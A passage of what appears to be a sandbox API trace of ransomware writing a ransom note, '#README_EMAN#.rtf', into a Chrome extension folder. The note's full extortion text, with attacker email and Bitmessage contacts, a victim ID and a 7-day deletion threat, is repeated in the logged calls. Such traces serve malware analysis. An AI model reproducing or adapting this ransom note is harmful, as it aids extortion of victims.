}}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nu y5\x97>\x13¹\x0cgR6÷Æ\x1dáh\x8f\"ûT¹\x9fcN", lpUsedDefaultChar=0x0) returned 8717 [0278.192] WriteFile (in: hFile=0x294, lpBuffer=0x1f495e8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1f495e8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0278.192] CloseHandle (hObject=0x294) returned 1 [0278.192] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\#readme_eman#.rtf")) returned 0xffffffff [0278.192] GetLastError () returned 0x2 [0278.192] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0278.193] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.193] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.193] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1f495e8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 